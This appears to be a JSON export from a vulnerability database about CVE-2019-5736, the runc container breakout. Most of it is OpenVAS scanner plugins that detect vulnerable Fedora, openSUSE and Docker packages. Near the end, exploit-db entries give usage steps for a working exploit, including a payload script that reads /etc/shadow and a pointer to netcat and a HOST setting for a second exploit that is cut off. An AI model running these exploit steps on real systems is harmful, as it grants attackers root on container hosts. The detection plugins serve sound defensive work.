script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC30\");\n\n script_xref(name:\"FEDORA\", value:\"2019-2baa1f7b19\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T4BDBZKL32NRG5KB5JVVWTKDPNXUNGA\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python3-lxc'\n package(s) announced via the FEDORA-2019-2baa1f7b19 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Linux Resource Containers provide process and resource isolation\nwithout the overhead of full virtualization.\n\nThe python3-lxc package contains the Python3\nbinding for LXC.\");\n\n script_tag(name:\"affected\", value:\"'python3-lxc' package(s) on Fedora 30.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC30\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"python3-lxc\", rpm:\"python3-lxc~3.0.4~1.fc30\", rls:\"FC30\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T16:48:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2019-02-19T00:00:00", "id": "OPENVAS:1361412562310852299", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852299", "type": "openvas", "title": "openSUSE: Security Advisory for docker-runc (openSUSE-SU-2019:0201-1)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852299\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2019-5736\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-02-19 04:06:06 +0100 (Tue, 19 Feb 2019)\");\n script_name(\"openSUSE: Security Advisory for docker-runc (openSUSE-SU-2019:0201-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:0201-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-02/msg00044.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'docker-runc'\n package(s) announced via the openSUSE-SU-2019:0201-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for docker-runc fixes the following issues:\n\n Security issue fixed:\n\n - CVE-2019-5736: Effectively copying /proc/self/exe during re-exec to\n avoid write attacks to the host runc binary, which could lead to a\n container breakout (bsc#1121967)\n\n This update was imported from the SUSE:SLE-12:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2019-201=1\");\n\n script_tag(name:\"affected\", value:\"docker-runc on openSUSE Leap 42.3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"docker-runc\", rpm:\"docker-runc~1.0.0rc5+gitr3562_69663f0bd4b6~8.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-runc-debuginfo\", rpm:\"docker-runc-debuginfo~1.0.0rc5+gitr3562_69663f0bd4b6~8.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-runc-debugsource\", rpm:\"docker-runc-debugsource~1.0.0rc5+gitr3562_69663f0bd4b6~8.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-runc-kubic\", rpm:\"docker-runc-kubic~1.0.0rc5+gitr3562_69663f0bd4b6~8.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-runc-kubic-debuginfo\", rpm:\"docker-runc-kubic-debuginfo~1.0.0rc5+gitr3562_69663f0bd4b6~8.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-runc-kubic-debugsource\", rpm:\"docker-runc-kubic-debugsource~1.0.0rc5+gitr3562_69663f0bd4b6~8.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-runc-kubic-test\", rpm:\"docker-runc-kubic-test~1.0.0rc5+gitr3562_69663f0bd4b6~8.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"docker-runc-test\", rpm:\"docker-runc-test~1.0.0rc5+gitr3562_69663f0bd4b6~8.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2019-02-21T00:00:00", "id": "OPENVAS:1361412562310875472", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875472", "type": "openvas", "title": "Fedora Update for runc FEDORA-2019-963ea958f9", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875472\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2019-5736\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2019-02-21 04:08:23 +0100 (Thu, 21 Feb 2019)\");\n script_name(\"Fedora Update for runc FEDORA-2019-963ea958f9\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-963ea958f9\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SJZZZT46EQOOI7MJTJQW7VNJLTCGZOLU\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'runc'\n package(s) announced via the FEDORA-2019-963ea958f9 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"runc on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"runc\", rpm:\"runc~1.0.0~68.dev.git6635b4f.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-09-10T14:48:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "description": "The remote host is missing an update for the ", "modified": "2019-09-10T00:00:00", "published": "2019-09-07T00:00:00", "id": "OPENVAS:1361412562310876768", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876768", "type": "openvas", "title": "Fedora Update for lxcfs FEDORA-2019-2baa1f7b19", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876768\");\n script_version(\"2019-09-10T08:05:24+0000\");\n script_cve_id(\"CVE-2019-5736\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-09-10 08:05:24 +0000 (Tue, 10 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-09-07 02:24:07 +0000 (Sat, 07 Sep 2019)\");\n script_name(\"Fedora Update for lxcfs FEDORA-2019-2baa1f7b19\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC30\");\n\n script_xref(name:\"FEDORA\", value:\"2019-2baa1f7b19\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EGZKRCKI3Y7FMADO2MENMT4TU24QGHFR\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'lxcfs'\n package(s) announced via the FEDORA-2019-2baa1f7b19 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"LXCFS is a simple userspace filesystem designed to work around some\ncurrent limitations of the Linux kernel.\n\nSpecifically, it&#39, s providing two main things\n\n - A set of files which can be bind-mounted over their /proc originals\n to provide CGroup-aware values.\n\n - A cgroupfs-like tree which is container aware.\n\nThe code is pretty simple, written in C using libfuse.\n\nThe main driver for this work was the need to run systemd based\ncontainers as a regular unprivileged user while still allowing systemd\ninside the container to interact with cgroups.\n\nNow with the introduction of the cgroup namespace in the Linux kernel,\nthat part is no longer necessary on recent kernels and focus is now on\nmaking containers feel more like a real independent system through the\nproc masking feature.\");\n\n script_tag(name:\"affected\", value:\"'lxcfs' package(s) on Fedora 30.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC30\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"lxcfs\", rpm:\"lxcfs~3.0.4~1.fc30\", rls:\"FC30\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "description": "runc through 1.0-rc6, as used in Docker, allows attackers to overwrite the\nhost runc binary (and consequently obtain host root access) by leveraging the ability to execute a command as\nroot within one of these types of containers: (1) a new container with an attacker-controlled image, or (2) an\nexisting container, to which the attacker previously had write access, that can be attached with docker exec.\nThis occurs because of file-descriptor mishandling, related to /proc/self/exe.", "modified": "2019-02-22T00:00:00", "published": "2019-02-14T00:00:00", "id": "OPENVAS:1361412562310141997", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141997", "type": "openvas", "title": "Docker < 18.09.2 runc Command Execution Vulnerability", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = 'cpe:/a:docker:docker';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141997\");\n script_version(\"$Revision: 13828 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-22 10:35:28 +0100 (Fri, 22 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2019-02-14 11:54:46 +0700 (Thu, 14 Feb 2019)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2019-5736\");\n script_bugtraq_id(106976);\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Docker < 18.09.2 runc Command Execution Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_docker_remote_detect.nasl\", \"gb_docker_service_detection_lsc.nasl\");\n script_mandatory_keys(\"docker/version\");\n\n script_tag(name:\"summary\", value:\"runc through 1.0-rc6, as used in Docker, allows attackers to overwrite the\nhost runc binary (and consequently obtain host root access) by leveraging the ability to execute a command as\nroot within one of these types of containers: (1) a new container with an attacker-controlled image, or (2) an\nexisting container, to which the attacker previously had write access, that can be attached with docker exec.\nThis occurs because of file-descriptor mishandling, related to /proc/self/exe.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"Docker prior version 18.09.2.\");\n\n script_tag(name:\"solution\", value:\"Update to version 18.09.2 or later.\");\n\n script_xref(name:\"URL\", value:\"https://docs.docker.com/engine/release-notes/\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE, nofork: TRUE))\n exit(0);\n\nif (version_is_less(version: version, test_version: \"18.09.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"18.09.2\");\n security_message(port: 0, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "description": "The remote host is missing an update for the ", "modified": "2019-05-14T00:00:00", "published": "2019-05-07T00:00:00", "id": "OPENVAS:1361412562310875806", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875806", "type": "openvas", "title": "Fedora Update for flatpak FEDORA-2019-fd9345f44a", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875806\");\n script_version(\"2019-05-14T05:04:40+0000\");\n script_cve_id(\"CVE-2019-5736\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 05:04:40 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-07 02:21:45 +0000 (Tue, 07 May 2019)\");\n script_name(\"Fedora Update for flatpak FEDORA-2019-fd9345f44a\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-fd9345f44a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KEEWWTWPOXFOQSOBEEMYNYIRW5I3RTWB\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flatpak'\n package(s) announced via the FEDORA-2019-fd9345f44a advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"flatpak is a system for building, distributing and running sandboxed desktop\napplications on Linux.\");\n\n script_tag(name:\"affected\", value:\"'flatpak' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"flatpak\", rpm:\"flatpak~1.2.3~1.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-09-10T14:46:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "description": "The remote host is missing an update for the ", "modified": "2019-09-10T00:00:00", "published": "2019-09-07T00:00:00", "id": "OPENVAS:1361412562310876772", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876772", "type": "openvas", "title": "Fedora Update for lxc FEDORA-2019-2baa1f7b19", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876772\");\n script_version(\"2019-09-10T08:05:24+0000\");\n script_cve_id(\"CVE-2019-5736\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-09-10 08:05:24 +0000 (Tue, 10 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-09-07 02:24:26 +0000 (Sat, 07 Sep 2019)\");\n script_name(\"Fedora Update for lxc FEDORA-2019-2baa1f7b19\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC30\");\n\n script_xref(name:\"FEDORA\", value:\"2019-2baa1f7b19\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/65IXLZTB6YNAXP3MTSPJSLOFVVRDMBF3\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'lxc'\n package(s) announced via the FEDORA-2019-2baa1f7b19 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Linux Resource Containers provide process and resource isolation without the\noverhead of full virtualization.\");\n\n script_tag(name:\"affected\", value:\"'lxc' package(s) on Fedora 30.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC30\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"lxc\", rpm:\"lxc~3.0.4~1.fc30\", rls:\"FC30\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2019-02-14T11:30:04", "description": "", "published": "2019-02-13T00:00:00", "type": "exploitdb", "title": "runc &lt; 1.0-rc6 (Docker &lt; 18.09.2) - Container Breakout (2)", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-5736"], "modified": "2019-02-13T00:00:00", "id": "EDB-ID:46369", "href": "https://www.exploit-db.com/exploits/46369", "sourceData": "## CVE-2019-5736 ##\r\n\r\nThis is exploit code for CVE-2019-5736 (and it works for both runc and LXC).\r\nThe simplest way to use it is to copy the exploit code into an existing\r\ncontainer, and run `make.sh`. However, you could just as easily create a bad\r\nimage and run that.\r\n\r\n```console\r\n% docker run --rm --name pwnme -dit ubuntu:18.10 bash\r\npwnme\r\n% docker cp CVE-2019-5736.tar pwnme:/CVE-2019-5736.tar\r\n```\r\n\r\nWe need to install `gcc` to build the exploit, and `runc` because we need to\r\nhave the shared libraries that `runc` would use. We don't actually use the\r\n`runc` binary itself. For LXC, you would install `lxc` instead of `runc`.\r\n\r\n```console\r\n% docker attach pwnme\r\n# apt-get update && apt-get install -y gcc runc\r\n[ snip ]\r\n# tar xf CVE-2019-5736.tar\r\n# ./CVE-2019-5736/make.sh\r\n```\r\n\r\nAnd now, `/bin/bash` in the container will be able to **overwrite the host runc\r\nbinary**. Since this binary is often executed by `root`, this allows for\r\nroot-level code execution on the host.\r\n\r\n```\r\n% docker exec -it pwnme /bin/bash\r\n[+] bad_libseccomp.so booted.\r\n[+] opened ro /proc/self/exe <3>.\r\n[+] constructed fdpath </proc/self/fd/3>\r\n[+] bad_init is ready -- see </tmp/bad_init_log> for logs.\r\n[*] dying to allow /proc/self/exe to be unused...\r\n% cat /usr/sbin/docker-runc\r\n#!/bin/bash\r\ntouch /w00t_w00t ; cat /etc/shadow\r\n```\r\n\r\nAnd now if you try to use Docker normally, the malicious script will execute\r\nwith root privileges:\r\n\r\n```\r\n% docker exec -it pwnme /bin/good_bash\r\nOCI runtime state failed: invalid character 'b' looking for beginning of value: unknown\r\n% file /w00t_w00t\r\n/w00t_w00t: empty\r\n```\r\n\r\nAnd obviously `make.sh` can be modified to make the evil path anything you\r\nlike. If you want to get access to the container, use `/bin/good_bash`.\r\n\r\n### License ###\r\n\r\n```\r\nCopyright (C) 2019 Aleksa Sarai <cyphar@cyphar.com>\r\nVulnerability discovered by Adam Iwaniuk and Borys Pop\u0142awski.\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy\r\nof this software and associated documentation files (the \"Software\"), to\r\ndeal in the Software without restriction, including without limitation the\r\nrights to use, copy, modify, merge, publish, distribute, sublicense, and/or\r\nsell copies of the Software, and to permit persons to whom the Software is\r\nfurnished to do so, subject to the following conditions:\r\n\r\n* The above copyright notice and this permission notice shall be included in\r\n all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\r\nFROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\r\nIN THE SOFTWARE.\r\n```\r\n\r\n\r\nDownload: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46369.zip\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46369"}, {"lastseen": "2019-02-12T19:24:16", "description": "", "published": "2019-02-12T00:00:00", "type": "exploitdb", "title": "runc&lt; 1.0-rc6 (Docker &lt; 18.09.2) - Host Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-5736"], "modified": "2019-02-12T00:00:00", "id": "EDB-ID:46359", "href": "https://www.exploit-db.com/exploits/46359", "sourceData": "# Usage\r\nEdit HOST inside `payload.c`, compile with `make`. Start `nc` and run `pwn.sh` inside the container.\r\n\r\n# 